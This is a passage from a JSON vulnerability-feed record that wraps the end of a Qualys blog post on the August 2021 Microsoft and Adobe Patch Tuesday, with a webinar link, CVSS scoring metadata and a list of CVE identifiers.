Month in Vulnerabilities and Patches_](<https://www.brighttalk.com/webcast/11673/502309>).\n\nWe discuss some of the key vulnerabilities disclosed in the past month and how to patch them:\n\n * Microsoft Patch Tuesday, August 2021\n * Adobe Patch Tuesday, August 2021\n\n[Join us live or watch on demand!](<https://www.brighttalk.com/webcast/11673/502309>)\n\n[Webinar August 12, 2021 or on demand](<https://www.brighttalk.com/webcast/11673/502309>).\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://qualys-secure.force.com/discussions/s/article/000006505>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-10T19:58:49", "type": "qualysblog", "title": "Microsoft and Adobe Patch Tuesday (August 2021) \u2013 Microsoft 51 Vulnerabilities with 7 Critical, Adobe 29 Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26423", "CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-33762", "CVE-2021-34471", "CVE-2021-34478", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34485", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34532", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36061", "CVE-2021-36062", "CVE-2021-36063", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36940", "CVE-2021-36941", "CVE-2021-36942", "CVE-2021-36943", "CVE-2021-36945", "CVE-2021-36946", "CVE-2021-36947", "CVE-2021-36948", "CVE-2021-36949"], "modified": "2021-08-10T19:58:49", "id": "QUALYSBLOG:0F0ACCA731E84F3B1067935E483FC950", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}